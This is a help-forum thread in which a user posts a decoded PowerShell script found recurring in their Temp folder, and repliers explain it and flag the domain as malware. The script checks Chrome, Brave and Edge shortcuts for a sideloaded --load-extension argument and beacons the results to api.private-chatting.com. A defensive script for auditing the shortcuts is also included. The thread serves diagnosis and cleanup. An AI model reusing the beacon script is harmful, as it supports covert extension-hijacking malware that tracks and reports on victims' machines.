Trojan code, can you tell me what it does?

I’ve been receiving Windows Defender notifications every half hour for a couple of days. The affected file is a ‘.ps1’ file that keeps reappearing at the path ‘C:\Users\sualp\AppData\Local\Temp’.

I have opened it with the text editor and it was encrypted 2 times using base 64. The code itself is this:

# Shortcut locations to scan: user/public desktops, Start Menu, pinned taskbar, OneDrive desktop
$searchPaths = @(
    "$env:USERPROFILE\Desktop",
    "$env:PUBLIC\Desktop",
    "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:USERPROFILE\OneDrive\Desktop"
);

# Counts shortcuts whose target is $appname. A shortcut is "active" when its arguments
# carry --load-extension=<path> and that path exists, i.e. the sideloaded extension is in place.
function Get-Install {
    param (
        $appname
    )
    $active = 0;
    $inactive = 0;
    # Matches the --load-extension=<path> argument, quoted or unquoted
    $rgx = New-Object 'System.Text.RegularExpressions.Regex' '\s?--load-extension=(("[^\r\n"]*")|([^\r\n\s]*))';
    # WScript.Shell COM object is used to read each .LNK's target and arguments
    $shell = New-Object -comObject WScript.Shell
    for ($searchPath_index = 0; $searchPath_index -lt $searchPaths.Count; $searchPath_index++) {
        $searchPath = $searchPaths[$searchPath_index];
        if ((Test-Path $searchPath) -eq $false) {
            continue;
        }
        $lnks = Get-ChildItem -Path $searchPath -Filter "*.LNK"
        foreach ($lnk in $lnks) {
            $lnkobj = $shell.CreateShortcut($lnk.FullName);
            $target = $lnkobj.TargetPath;
            if ((Test-Path $target) -eq $false) {
                continue;
            }
            $target = (Resolve-Path -Path $target).Path.ToLower();
            if ($target.EndsWith($appname, 'OrdinalIgnoreCase')) {
                $enabled = $false;
                $arguments = $lnkobj.Arguments;
                if ($null -ne $arguments) {
                    $m = $rgx.Match($arguments);
                    if ($m.Success -eq $true) {
                        $path = $m.Groups[1].Value;
                        $path = $path.Trim('"');
                        # "enabled" only if the extension directory still exists on disk
                        $enabled = ((Test-Path $path) -eq $true);
                    }
                }
                if ($enabled) {
                    $active++;
                }
                else {
                    $inactive++;
                }
            }
        }
    }
    return "$($active),$($inactive)";
}

# Build a status report: "100" header, then one line per browser (index,active,inactive)
$verified = "100`r`n";
$verified += "0,$(Get-Install 'chrome.exe')`r`n";
$verified += "1,$(Get-Install 'brave.exe')`r`n";
$verified += "2,$(Get-Install 'msedge.exe')`r`n";
# Send the base64-encoded report to the remote server in a custom HTTP header (the check-in/beacon)
Invoke-RestMethod -Uri 'http://api.private-chatting.com/update' -Headers @{ 'X-notify' = ([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($verified))) }

Can someone please help me to understand what it really does? Thanks a lot

Hello alvarotik

I want you to note I am no expert! But,

Trick is to know where you picked this up.

Do you or have you visited private-chatting[.]com intentionally? Have you done a web search to see if others have input about this site?

What the script is doing is probing your computer to see if you have google, brave or msedge installed, in one of six locations under $searchPaths and if you have their extension installed on those browsers.

Do a search for private-chatting in $env:APPDATA.
Take the string “$env:APPDATA” and enter it into powershell. It will give you a location.
In my case it was C:\Users\someuser\AppData\Roaming
Open Explorer to that location and do the search private-chatting. This might appear in a folder and that folder’s name will tell you where you picked up this script, maybe.

You can check one of the other locations under $searchPaths as well.

You can also check these same locations for ‘.LNK’ no quotes

The LNK files are shortcut files that are associated with Windows and developed by Microsoft Corporation. LNK is an acronym for LINK. LNK files (also known as shell links) are used as a reference to an original file. The script is looking for shortcuts probably to the extension created by private-chatting[.]com

This will help you determine what is going on further.

This script then sends a header to api[.]private-chatting[.]com/update. What they do with it depends on what you can find out from the steps I have given you above.

Again, I did not run any diagnostics on it. I do not have your environment to do that with. I only read the script. I am no expert. But you will be able to figure out more if you follow the steps I gave you.

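A defensive check that turns the script's own logic around, added here as an example and not part of the thread: it lists browser shortcuts in the same six locations whose arguments carry --load-extension, which is the flag that forces an unpacked extension into Chrome, Brave or Edge, and shows whether the extension folder still exists. Unlike the original script it also recurses into subfolders of those locations; it assumes Windows PowerShell 5.1 or later and makes no changes unless you uncomment the cleanup line.

```powershell
# Added example: audit browser shortcuts for an injected --load-extension argument.
# Same search paths the malicious script used; extend the list if you pin shortcuts elsewhere.
$searchPaths = @(
    "$env:USERPROFILE\Desktop",
    "$env:PUBLIC\Desktop",
    "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:USERPROFILE\OneDrive\Desktop"
)
$browsers = @('chrome.exe', 'brave.exe', 'msedge.exe')
# Group 1: quoted path, group 2: unquoted path
$rgx   = [regex]'--load-extension=(?:"([^"\r\n]*)"|([^\s\r\n]*))'
$shell = New-Object -ComObject WScript.Shell

$findings = foreach ($searchPath in $searchPaths) {
    if (-not (Test-Path -LiteralPath $searchPath)) { continue }
    # Recurse so Start Menu subfolders are covered as well
    Get-ChildItem -LiteralPath $searchPath -Filter '*.lnk' -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnkobj     = $shell.CreateShortcut($_.FullName)
            $targetName = [IO.Path]::GetFileName([string]$lnkobj.TargetPath).ToLower()
            if ($browsers -notcontains $targetName) { return }   # not a browser shortcut
            $m = $rgx.Match([string]$lnkobj.Arguments)
            if (-not $m.Success) { return }                       # no sideloaded extension
            $extPath = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
            [pscustomobject]@{
                Shortcut      = $_.FullName
                Browser       = $targetName
                ExtensionPath = $extPath
                StillOnDisk   = [bool](Test-Path -LiteralPath $extPath)
            }
        }
}

if ($findings) {
    $findings | Format-Table -AutoSize
    # Cleanup (uncomment after reviewing the output): remove the injected argument from each shortcut.
    # foreach ($f in $findings) {
    #     $s = $shell.CreateShortcut($f.Shortcut)
    #     $s.Arguments = $rgx.Replace([string]$s.Arguments, '').Trim()
    #     $s.Save()
    # }
} else {
    'No browser shortcuts with --load-extension found.'
}
```

Any hit with StillOnDisk set to True points at the extension directory that should be removed along with the scheduled task or startup entry that keeps re-creating the .ps1 in the Temp folder.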


Hello alvarotik

While I replied to your post I made the mistake of creating active links to private-chatting .com and received a message from a moderator that I need to fix this.

That message you should read:

Please edit your post and remove the hyperlinks.
VirusTotal lists the site as known malware/spyware.

Google is your friend:

https://answers.microsoft.com/en-us/windows/forum/all/powershell-virus/a82c44c2-e0df-4be9-8235-b12f1b404502